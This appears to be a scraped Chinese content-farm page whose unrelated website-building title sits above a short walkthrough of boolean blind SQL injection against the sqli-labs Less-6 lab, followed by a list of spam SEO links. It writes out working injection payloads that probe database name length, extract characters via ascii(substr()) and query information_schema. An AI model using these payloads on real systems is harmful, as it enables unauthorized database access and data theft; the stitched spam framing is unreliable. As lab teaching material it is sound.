当前位置: 首页 > news >正文

菏泽网站建设信息五种新型营销方式

菏泽网站建设信息,五种新型营销方式,广告设计与制作专业技能,网站导航条和表格怎么做简介 SQL注入(SQL Injection)是一种常见的网络攻击方式,通过向SQL查询中插入恶意的SQL代码,攻击者可以操控数据库,SQL注入是一种代码注入攻击,其中攻击者将恶意的SQL代码插入到应用程序的输入字段中&am…

简介
   

        SQL注入(SQL Injection)是一种常见的网络攻击方式,通过向SQL查询中插入恶意的SQL代码,攻击者可以操控数据库,SQL注入是一种代码注入攻击,其中攻击者将恶意的SQL代码插入到应用程序的输入字段中,然后这些输入被传递到数据库服务器上执行。攻击者可以利用这一漏洞执行任意的SQL查询或命令,从而访问或操控数据库中的敏感信息。

       SQL注入的一个简要流程:

1、打开目标靶场

 2、选择less - 6

3、确定网站可以注入的参数

http://172.16.1.13/Less-6/?id= 

4、判断闭合方式   

 http://172.16.1.13/Less-6/?id=1" --+

5、确定数据库长度length()函数

因为页面只有ture和flase两种情况,所以需要使用布尔盲注判断数据库长度,使用length()函数

例如: http://172.16.1.13/Less-6/?id=1" and length(database())>6--+

http://172.16.1.13/Less-6/?id=1" and length(database())>8--+

最终可以确定数据库名长度为8

6、确定数据库字符使用ASCII码

用ascii码截取数据库的第一位字符 判断第一位字符的ascii码是否大于114 页面显示正常 说明数据库第一位字符ascii码大于114

http://172.16.1.13/Less-6/?id=1" and ascii(substr(database(),1,1))>120--+

最终可以确定第一位字符ascii码为115,确定为字母s

以此类推,最终可确定数据库名为 security

7、查询数据库中第一张表

查询第一张表的第一个字符

http://172.16.1.13/Less-6/?id=1" and ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1))>100--+

最终可以确定第一位字符ascii码为101,确定为字母e

按照此法依次可以得出最终自己想要的数据内容!!!

安全 

网络安全为人民,网络安全靠人民。

http://www.ds6.com.cn/news/25923.html

相关文章:

  • 可以做网站的appb站推广2023
  • v电影主题 wordpress开封网站优化公司
  • 深圳做积分商城网站建设营销型网站建设怎么做
  • 网站一般做多大的google移动服务应用优化
  • 国家和城乡建设部网站大连网站seo
  • 网站横幅怎么制作教程活动营销案例100例
  • 关于企业网站建设的必要性搜索引擎营销总结
  • 政府网站集约建设日本比分算1:1
  • 做游戏网站的分析百度广告怎么投放
  • 上海做网站设计的公司百度小说
  • 移动端网站生成器百度搜索入口网址
  • 网站建设的需求分析网站开发的流程
  • 国家企业事业部门网站做的垃圾互联网广告联盟
  • 北京网站制作公司清远南通网站快速收录
  • 深喉咙企业网站模板最新国际军事动态
  • 怎么做网站建设赚钱seo到底是什么
  • 开发网站服务器黄山网站建设
  • 百度竞价排名技巧seo常用的工具
  • 怎么用云服务器做网站简阳seo排名优化课程
  • 网站多久需要维护最好的推广平台是什么软件
  • html5网页设计源代码优化设计电子课本下载
  • 网站制作台州360优化大师官方下载
  • 拱墅网站建设上海seo怎么优化
  • 您的网站空间即将过期平台优化是指什么
  • 类似于美团的网站怎么做博客营销案例
  • asp购物网站客户查看购物车刚刚北京传来重大消息
  • 零食店网站构建策划报告2023年度最火关键词
  • 商丘柘城做网站利尔化学股票股吧
  • 网站除了域名还要什么用广告推广计划
  • 秦皇岛网站制作看b站视频软件下载安装手机